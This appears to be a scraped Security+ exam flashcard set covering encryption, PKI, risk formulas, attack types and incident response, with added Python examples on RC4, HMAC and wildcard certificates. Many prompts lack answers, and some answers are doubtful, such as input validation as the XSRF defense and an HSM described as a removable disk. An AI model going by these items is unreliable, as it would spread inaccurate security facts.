Strong access controls and encryption are two primary methods of protecting the _____________ of any data, including customer data.
A business owner is preparing to decommission a server that has processed sensitive data. He plans to remove the hard drives and send them to a company that destroys them. However, he wants to be certain that personnel at that company cannot access data on the drives. Which of the following is the BEST option to meet this goal?
full disk encryption or disk wiping procedures to erase the data
_____________ identifies how long to keep data.
_____________ can be very tedious and won't necessarily encrypt all of the sensitive data on a hard drive.
Your organization is considering the purchase of new computers. A security professional stresses that these devices should include Trusted Platform Module (TPMs). What benefit does a TPM provide?
uses hardware encryption and stores RSA encryption keys
A _____________ is a hardware chip that stores RSA encryption keys and hardware encryption.
Trusted Platform Module (TPM)
A Trusted Platform Module (TPM) does not use _____________ encryption.
A hardware security module (HSM) is a removable hardware disk that uses _____________, but it does not have a file system. A Trusted Platform Module (TPM) does not provide HSM as a benefit.
What function does an HSM include?
Generates and stores keys used with servers
A _____________ is a removable device that can generate and store RSA keys used with servers for data encryption.
hardware security module (HSM)
Homer installed code designed to enable his account automatically, three days after someone disables it. What did Homer create?
backdoor using a logic bomb
______________ include hidden processes, but they do not activate in response to events.
An ______________ uses techniques to make it difficult for researchers to reverse engineer it.
Your local library is planning to purchase new computers that patrons can use for Internet research. What can be used to protect these computers?
anti-malware software and cable locks
Your organization has been receiving a significant amount of spam with links to malicious web sites. You want to stop the spam.
Add the domain to a block list
A _____________ blocks outgoing traffic and can be used to block the links to the malicious web sites, but it doesn't stop spam email from coming in.
Attackers have launched an attack using multiple systems against a single target. What type of attack is this?
A _____________ is an example of a DoS attack.
A __________ is a type of DoS attack that attempts to write data into an application's memory.
Security administrators are reviewing security controls and their usefulness. Which of the following attacks will account lockout controls prevent?
brute force and dictionary attacks
__________ attempts to redirect web browsers to malicious URLs.
A web developer wants to reduce the chances of an attacker successfully launching cross-site request forgery (XSRF) attacks against a web site application. What can provide protection against this attack?
server-side input validation
__________ input using server-side input validation can restrict the use of special characters needed in cross-site request forgery (XSRF) attacks. Client-side input validation can be combined with server-side validation, but it can be bypassed and should not be used alone.
Validating and filtering
A web developer is adding input validation techniques to a web site application. Which of the following should the developer implement during this process?
perform the validation on the server side
Boundary or limit checks are an important part of _________.
An attacker is attempting to write more data into a web application's memory than it can handle. What type of attack is this?
One type of ________ attempts to write more data in an application's memory than it can handle.
buffer overflow attack
A ________ attempts to launch attacks with HTML code.
cross-site request forgery (XSRF)
________ attempts to query directory service databases such as Microsoft Active Directory.
Lightweight Directory Access Protocol (LDAP)
________ inputs random data into an application during testing.
During a penetration test, a tester injected extra input into an application causing the application to crash. What does this describe?
Fuzzing or fuzz testing sends ________ to an application to test it. Ideally, the application can handle the extra input, but it is possible that fuzz testing causes an application to crash.
A security expert is attempting to identify the number of failures a web server has in a year. Which of the following is the expert MOST likely identifying?
Annualized loss expectancy (ALE)
Annualized loss expectancy (ALE) is part of a ________. It is calculated by multiplying the single loss expectancy (SLE) by the annualized rate of occurrence (ARO).
quantitative risk assessment
You are trying to add additional security controls for a database server that includes customer records and need to justify the cost of $1,000 for these controls. The database includes 2,500 records. Estimates indicate a cost of $300 for each record if an attacker successfully gains access to them. Research indicates that there is a 10% possibility of a data breach in the next year. What is the ALE?
$75,000 (SLE is $750,000 [2,500 x $300]; ARO is 10%; ALE = SLE x ARO = $750,000 x 10% = $75,000)
A penetration tester is tasked with gaining information on one of your internal servers and he enters the following command: telnet server1 80. What is the purpose of this command?
Identify if server1 is running a service using port 80 and is reachable.
________ is a common beginning command for a banner grabbing attempt.
telnet server1 80
A recent vulnerability assessment identified several issues related to an organization's security posture. Which of the following issues is MOST likely to affect the organization on a day-to-day basis?
lack of antimalware software
________ is a constant threat and without antivirus software, systems are sure to become infected in a short period of time.
Which of the following tools would a security administrator use to identify misconfigured systems within a network?
A vulnerability scan checks systems for potential vulnerabilities, including vulnerabilities related to ________.
A penetration test can identify misconfigured systems, but it also attempts to ________ on those systems and isn't appropriate if you only want to identify the systems.
A security expert is running tests to identify the security posture of a network. However, these tests are not exploiting any weaknesses. Which of the following types of test is the security expert performing?
Which of the following tools is the LEAST invasive and can verify if security controls are in place?
A vulnerability scan identifies the ________ of a network but it does not actually exploit any weaknesses.
A ________ is not invasive and does not determine if security controls are in place.
________ identifies hosts on a network.
Your organization develops web application software, which it sells to other companies for commercial use. To ensure the software is secure, your organization uses a peer assessment to help identify potential security issues related to the software. Which of the following is the BEST term for this process?
Peers, such as other developers, perform code reviews going line-by-line through the software code looking for vulnerabilities, such as ________.
buffer overflows and race conditions
Your organization plans to deploy new systems within the network within the next six months. What should your organization implement to ensure these systems are developed properly?
A ________ ensures that systems and software are developed properly.
A ________ identifies changes from the initial baseline configuration, but is not done on systems that aren't deployed yet.
Identifying the ________, including the required protocols and services, would likely be part of the design review.
You need to periodically check the configuration of a server and identify any changes. What are you performing?
Your organization hired an external security expert to test a web application. The security expert is not given any access to the application interfaces, code, or data. What type of test will the security expert perform?
A security administrator needs to inspect protocol headers of traffic sent across the network. What tool is the BEST choice for this task?
protocol analyzer or sniffer
You are troubleshooting issues between two servers on your network and need to analyze the network traffic. Of the following choices, what is the BEST choice?
You are troubleshooting issues between two servers on your network and need to analyze the network traffic. A protocol analyzer would be the BEST choice to capture and analyze network traffic. Although the traffic probably goes through a ________, it doesn't capture the traffic in such a way that you can analyze it.
Which of the following is the lowest cost solution for fault tolerance?
A RAID subsystem is a relatively low-cost solution for _______ for disks.
You need to modify the network infrastructure to increase availability of web-based applications for Internet clients. Which of the following choices provides the BEST solution?
_______ increase the availability of web-based solutions by spreading the load among multiple servers.
A _______ system protects internal resources from attacks, but does not directly increase the availability of web-based applications.
unified threat management (UTM)
_______ is one of the features of a unified threat management (UTM), and it protects internal clients, but does not directly increase the availability of web-based applications.
A security analyst is creating a document that includes the expected monetary loss from a major outage. She is calculating the potential lost sales, fines, and impact on the organization's customers. Which of the following documents is she MOST likely creating?
business impact analysis (BIA)
A business impact analysis (BIA) identifies critical systems and components and includes information on potential monetary losses; it is part of a _______.
business continuity plan (BCP)
A _______ includes methods used to recover from an outage and includes a list of systems to recover in hierarchical order.
disaster recovery plan (DRP)
The _______ refers to the maximum amount of data (expressed as a point in time) the organization can afford to lose, but it does not include monetary losses.
recovery point objective (RPO)
Your organization is updating its business continuity documents. You're asked to review the communications plans for possible updates. Which of the following should you ensure is included in the communications plan?
methods used to respond to media requests, including templates
A _______ will include methods used to respond to media requests, including basic templates. It would also include methods used to communicate with response team members, employees, suppliers, and customers.
What type of encryption does the RADIUS protocol use?
Your organization is planning to implement videoconferencing, but it wants to protect the confidentiality of the streaming video. Which of the following would BEST meet this need?
RC4 is a symmetric encryption _______, which is often described as the best choice for encrypting data of an unknown size, such as streaming video, because it encrypts one byte at a time rather than in fixed blocks. Note that RC4 is now considered broken (its keystream has statistical biases) and RFC 7465 prohibits it in TLS, so it should not be used in new designs.
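To make the "unknown size" property and its main hazard concrete, here is an added example that is not part of the original page: a minimal RC4 implementation that can be fed data chunk by chunk, checked against the published RC4 test vectors (key "Key" with plaintext "Plaintext", and "Wiki" with "pedia"), together with a function showing what leaks when one key encrypts two streams. The plaintexts in the reuse demo are constructed, and the class and function names are this example's own. This is for study only; do not use RC4 in real systems.

```python
# Added example, not from the original page: a minimal RC4 implementation used
# to show (a) why a stream cipher suits data of unknown length and (b) why the
# same key must never encrypt two streams. Test vectors are the published RC4
# ones; the plaintexts in the reuse demo are constructed. Do not use RC4 in
# real systems.


class RC4:
    """Stateful RC4 so data can be fed in chunks as it arrives."""

    def __init__(self, key: bytes) -> None:
        if not 1 <= len(key) <= 256:
            raise ValueError("RC4 key must be 1..256 bytes")
        S = list(range(256))
        j = 0
        for i in range(256):  # key-scheduling algorithm (KSA)
            j = (j + S[i] + key[i % len(key)]) & 0xFF
            S[i], S[j] = S[j], S[i]
        self._S, self._i, self._j = S, 0, 0

    def _next_byte(self) -> int:  # pseudo-random generation algorithm (PRGA)
        S = self._S
        self._i = (self._i + 1) & 0xFF
        self._j = (self._j + S[self._i]) & 0xFF
        S[self._i], S[self._j] = S[self._j], S[self._i]
        return S[(S[self._i] + S[self._j]) & 0xFF]

    def process(self, data: bytes) -> bytes:
        """Encrypt or decrypt (same operation): XOR each byte with the keystream."""
        return bytes(b ^ self._next_byte() for b in data)


def rc4(key: bytes, data: bytes) -> bytes:
    return RC4(key).process(data)


def encrypt_stream(key: bytes, chunks) -> bytes:
    """Length need not be known up front: one cipher object consumes each chunk
    as it arrives, which is why a stream cipher suits live video."""
    cipher = RC4(key)
    return b"".join(cipher.process(c) for c in chunks)


def keystream_reuse_leak(c1: bytes, c2: bytes) -> bytes:
    """If two messages were encrypted under the same key, XORing the ciphertexts
    cancels the keystream and yields plaintext1 XOR plaintext2. Knowing (or
    guessing) one plaintext then reveals the other directly."""
    return bytes(a ^ b for a, b in zip(c1, c2))
```

The reuse function is the reason a stream cipher needs a fresh key (or a nonce mixed into the key) per stream; the same XOR-cancellation applies to any stream cipher, not only RC4.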
An organization is implementing a PKI and plans on using public and private keys. Which of the following can be used to create strong key pairs?
Rivest, Shamir, Adleman (RSA) is used to create key pairs
MD5 and HMAC are _______.
AES is a _______ encryption algorithm.
Your organization is investigating possible methods of sharing encryption keys over a public network. Which of the following is the BEST choice?
Elliptic Curve Diffie-Hellman Ephemeral (ECDHE)
Elliptic Curve Diffie-Hellman Ephemeral (ECDHE) allows entities to negotiate _______ securely over a public network.
You need to ensure data sent over an IP-based network remains confidential. Which of the following provides the BEST solution?
transport encryption such as IPsec
A user wants to hide confidential data within a .jpg file. What could they use to achieve this?
Personnel within your company are assisting an external auditor perform a security audit. They frequently send documents to the auditor via email and some of these documents contain confidential information. Management wants to implement a solution to reduce the possibility of unintentionally exposing this data. Which of the following is the BEST choice?
Encrypt all outbound email containing confidential information
_______ provide proof of who sent an email, but don't protect confidentiality.
Which two protocols provide strong security for the Internet with the use of certificates?
SSL and TLS (all versions of SSL are now deprecated; RFC 7568 prohibits SSL 3.0, so in practice this means TLS 1.2 or later)
Lenny and Carl work in an organization that includes a PKI. Carl needs to send a digitally signed file to Lenny. What does Carl use in this process?
Carl's private key
If Carl needs to send a digitally signed file to Lenny, Carl creates the signature with his private key. Lenny uses Carl's _______ to decrypt (verify) the digital signature.
Bart recently sent out confidential data via email to potential competitors. Management suspects he did so accidentally, but Bart denied sending the data. Management wants to implement a method that would prevent Bart from denying accountability in the future. What are they trying to enforce?
Non-repudiation methods such as _______ prevent users from denying they took an action.
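Why the non-repudiation answer here is a signature rather than the hash-based MAC named earlier in the set (hashing algorithms such as HMAC prove integrity, digital signatures prove who sent a message). This is an added example and not part of the original page: a keyed MAC detects tampering, but because the recipient holds the same key, the recipient can produce a valid tag for a message the sender never sent, so a MAC can never settle a dispute over who sent what. The key and messages are constructed, and the function names are this example's own.

```python
import hashlib
import hmac

# Added example, not from the original page: a keyed MAC proves integrity and
# "someone holding the key sent this", but not non-repudiation. The key and
# messages are constructed for the demo.

SHARED_KEY = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f0" * 2)  # constructed 32-byte key


def mac(key: bytes, message: bytes) -> bytes:
    return hmac.new(key, message, hashlib.sha256).digest()


def verify(key: bytes, message: bytes, tag: bytes) -> bool:
    # compare_digest runs in constant time; a plain == would leak timing on the
    # first mismatching byte.
    return hmac.compare_digest(mac(key, message), tag)


def demo() -> dict:
    original = b"From: bart\nTo: competitor\nSubject: pricing sheet\n"
    tag = mac(SHARED_KEY, original)

    tampered = original.replace(b"pricing", b"lunch")

    # The recipient holds the same key, so they can mint a valid tag for a
    # message Bart never sent. A MAC therefore cannot settle "Bart sent this";
    # only a signature made with Bart's private key, which the recipient does
    # not have, can.
    forged = b"From: bart\nTo: competitor\nSubject: full customer list\n"
    forged_tag = mac(SHARED_KEY, forged)

    return {
        "genuine_verifies": verify(SHARED_KEY, original, tag),
        "tamper_detected": not verify(SHARED_KEY, tampered, tag),
        "recipient_can_forge": verify(SHARED_KEY, forged, forged_tag),
    }
```

The third result is the whole point: both parties can produce valid tags, so a valid tag is evidence that one of them sent the message, not which one. A signature verified with the sender's public key does not have that ambiguity, which is why it is what management would need to hold Bart accountable.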
An organization is planning to implement an internal PKI for smart cards. Which of the following should the organization do FIRST?
install a certificate authority (CA)
A PKI requires a certificate authority (CA). Smart cards require certificates and would be issued by the CA. After installing the CA, you can generate _______ to be used with certificates issued by the CA.
Which of the following is a valid reason to use a wildcard certificate?
reduce the administrative burden of managing certificates
A _______ reduces the certificate management burden by using an asterisk (*) in place of child domain names. The asterisk stands for exactly one label: *.example.com covers www.example.com but neither a.b.example.com nor the bare example.com. The certificate still has a single public and private key pair, and its lifetime isn't affected. The trade-off is that every host presenting the certificate shares that one private key, so compromising any of them exposes all of them.
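The matching rule a TLS client applies to such a certificate, written out as an added example that is not part of the original page so the limits are visible: one label only, the asterisk must be the whole leftmost label, and a top-level wildcard such as *.com is refused. It follows the conservative reading of RFC 6125 section 6.4.3 (partial-label wildcards such as w*.example.com, which that RFC leaves optional, are rejected). Host names are constructed and the function names are this example's own.

```python
# Added example, not from the original page: the matching rule a TLS client
# applies to a wildcard certificate, written out so the limits are visible.
# Host names are constructed.


def wildcard_matches(presented: str, hostname: str) -> bool:
    """Match a certificate name (dNSName) against a host name.

    Rules (RFC 6125 section 6.4.3, conservative reading):
    * comparison is case-insensitive;
    * '*' may only be the entire leftmost label, so w*.example.com is rejected;
    * it matches exactly one label: *.example.com covers www.example.com but
      neither a.b.example.com nor the bare example.com;
    * a wildcard needs at least two labels after it (*.com is refused).
    """
    p = presented.lower().rstrip(".").split(".")
    h = hostname.lower().rstrip(".").split(".")
    if any(not label for label in p) or any(not label for label in h):
        return False  # empty labels (e.g. "www..example.com") are never valid
    if "*" not in presented:
        return p == h
    if p[0] != "*" or any("*" in label for label in p[1:]) or len(p) < 3:
        return False
    return len(h) == len(p) and h[1:] == p[1:]


def hosts_covered(presented: str, hostnames) -> list:
    """Which of an organization's host names one wildcard certificate would serve."""
    return [name for name in hostnames if wildcard_matches(presented, name)]
```

Running `hosts_covered("*.example.com", ...)` over an inventory before buying the certificate shows which deeper names (dev.api.example.com, for instance) will still need their own certificate or a subject alternative name.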
Homer works as a contractor at a company on a one-year renewing contract. After renewing his contract, the company issues him a new smart card. However, he is now having problems digitally signing email or opening encrypted email. What is MOST likely the solution?
publish the certificate in his new smart card
When a new smart card is issued, the certificate in the smart card needs to be published in a _______ within the domain. Users can't simply copy the certificate or keys from the old card: the private key is generated on the card and is not exportable.
global address list
You need to request a certificate for a web server. Which of the following would you MOST likely use?
certificate signing request (CSR)
A certificate signing request (CSR) is a standard-format message (PKCS #10) containing the requester's public key and identifying information, signed with the matching private key to prove possession of it. You submit the CSR to a _______, which issues the certificate; the private key never leaves the web server.
Certificate Authority (CA)
An organization is implementing a data policy and wants to designate a recovery agent. Which of the following indicates what a recovery agent can do?
a recovery agent can decrypt data if users lose their private key
Recovery agents can decrypt data and messages if users lose their _______. Public keys are publicly available, so recovery agents aren't needed to retrieve them.
An organizational policy specifies that duties of application developers and administrators must be separated. What is the MOST likely result of implementing this policy?
one group develops program code and the other group deploys the code
An example of a _______ is where the application developers create and modify code and the administrators deploy the code to live production systems, but neither group can perform both functions. Developers would typically develop the original code, and modify it when necessary.
separation of duties
Application developers in your organization currently update applications on live production servers when needed. However, they do not follow any predefined procedures before applying the updates. What should the organization implement to prevent any risk associated with this process?
A _______ ensures that changes are reviewed and approved before being implemented, which reduces the risk of unintended outages.
change management process
Which of the following is a type of media that allows the mass distribution of personal comments to specific groups of people?
Social media and peer-to-peer sites are a potential risk to organizations due to possible _______.
Your organization wants to prevent damage from malware. Which stage of the common incident response procedures is the BEST stage to address this?
You are reviewing incident response procedures related to the order of volatility. Which of the following is the LEAST volatile?
hard disk drive
Security personnel confiscated a user's workstation after a security incident. Administrators removed the hard drive for forensic analysis, but left it unattended for several hours before capturing an image. What could prevent the company from taking the employee to court over this incident?
a chain of custody was not maintained